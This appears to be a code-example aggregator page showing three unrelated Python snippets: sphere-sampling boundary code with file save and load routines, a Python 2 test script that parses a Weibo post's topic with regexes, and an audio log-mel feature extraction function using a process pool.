                            #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                            bndSphDict[str(bndConfig)] = newDistSamp;
                            boundaryQueue.append( bndConfig );				# put the boundary config to the queue.
                        
                        ###########################=========================================================
                        if len(self.mDistSamples)%100 == 0:
                            print "------------ FRESH -------------"
                            for sphere in self.mDistSamples:
                                boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ]
                        ###########################=========================================================

                        print "\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue));
                        

    def writeSamplesToFile( self, filename ):
        file2write = open( filename, 'w' );
        formattedData = ""
        for vector in self.mDistSamples:
            for i in range( 0, len(vector.mSample) ):
                formattedData += str( vector.mSample[i] ) + "\t";
            formattedData += str(vector.mRadius);
            formattedData += "\n";
            pass
        
        file2write.write( formattedData );
        file2write.close();

    def loadDistSamplesFromFile( self, filename ):
        file2read = open( filename, 'r' );
        self.mDistSamples = [];
        lineNum = 0;
        for line in file2read:
            if( lineNum % 100 == 0 ):
                print "Reading line: {0}".format( lineNum );
            lineNum += 1;
            strDistSamp = line;
            info = strDistSamp.split( '\t' );
            dim = len(info);
            pos = [0] * (dim-1);
            for i in range(0,dim-1):
                pos[i] = float( info[i] );
            radius = float(info[dim-1]);
            distSamp = DistSample(tuple(pos), radius);
            if( distSamp.mRadius >= 2 ):
                self.mDistSamples += [ distSamp ];
                self.mSpacePartition.addSphere( distSamp );

    def renderDistSamples(self, imgSurf):
        for samp in self.mDistSamples:
            samp.render( imgSurf, (0,250,0) );
Ejemplo n.º 54
0
Archivo: test.py Proyecto: gugug/git
    return t1, t2, t3


t = tt()
print t
print '博文', t[2]
z = zip(t[0], t[1], t[2])
print len(z)
for i in range(len(z)):
    print z[i]
from multiprocessing import Process, Manager

l = Manager().list()
d = {1: 1, 2: 2, 3: 3, 4: 4}
l.append(d)
print l

j = 'id 1749990115 博文id M_DwImDw3ct 博文 【悲催!男子欲滑翔求婚 不想挂树上了[笑cry]】21日,湖北宜昌一男子乘坐滑翔伞在空中向女朋友求婚。但在降落时,因一阵强风被刮到树上,被挂近一小时,最后请来吊车救援。辛苦下树的男子手抱花束,来到女友面前求婚。但女友没有答应转身离去……网友:天公不作美,求婚现场成事故现场[doge](三峡晚报&nbsp;全文'
topic_patternts = re.compile('【.*?】')
topic = topic_patternts.findall(j)
print topic[0]
if len(topic) > 0:
    topic_clean_pattern = re.compile('(\[.*?])')
    topic = re.sub(topic_clean_pattern, '', topic[0])
    topic_clean2_pattern = re.compile('#(.*?)#')
    topic = re.sub(topic_clean2_pattern, '', topic)

print topic

Ejemplo n.º 55
0
def extractFeatures(src_dir, base_dir='extracted_features', dataset='us', aug_type='origin', save=False):
	if base_dir is '':
		base_dir = path.split(path.abspath(src_dir))[0]
	n_cores = 20

	feat_type = 'logmelspec10000'
	sr = 44100
	win_size = [1024, 4096, 16384]
	hop_size = 512
	n_mels = 128
	
	dir_name = '{}.{}_{}_{}'.format(feat_type, sr, hop_size, n_mels)
	for ws in win_size:
		dir_name += '.' + str(int(ws/1024))
	# feat_dir = path.join('data/feature', 
	# 					 dir_name,
	# 					 base_dir)
	
	fp_dict = {}
	fp_list = []
	for root, dirs, files in os.walk(src_dir):
		if files:
			nof = 0
			for in_fn in files:
				if isAudioFile(in_fn, dataset):
					in_fp = path.join(root, in_fn)
					fn, tn = getFileInfo(in_fp, dataset)
					if fn in fp_dict:
						fp_dict[fn][-1][tn] = 1
					else:
						target = np.zeros(NUM_TAG, dtype=int)
						target[tn] = 1
						fp_dict[fn] = (in_fp, fn, target)
					# fp_list.append(in_fp)
					nof += 1
			print('{} files in {}'.format(nof, root))
	print('We got totally {} clips.'.format(len(fp_dict.keys())))

	num_stat = np.zeros(NUM_TAG, dtype=int)
	for _p, _n, tags in fp_dict.values():
		num_stat[np.sum(tags)-1] += 1
	print('Number of clips according to each number of tags:')
	for i in range(NUM_TAG):
		print('tags: {}, clips: {}'.format(i, num_stat[i]))

	all_feat = Manager().list()
	test_file_list = Manager().list()
	lock = Lock()
	func = _func_tag_label

	for root, dirs, files in os.walk(out_dir):
		for _fn in files:
			fn = _fn.replace('.npy', '')
			all_feat.append(fn)

	# for f in all_feat:
	# 	if f in fp_dict:
	# 		del fp_dict[f]
	# print('{} clips left.'.format(len(fp_dict.keys())))
	# for f in fp_dict:
	# 	print(f)
	# return

	pool = Pool(processes=n_cores, 
				initializer=initProcess, 
				initargs=(dataset, all_feat, lock, sr, 
						  win_size, hop_size, n_mels, aug_type))
	result = pool.map(func, fp_dict.values())
	pool.close()
	pool.join()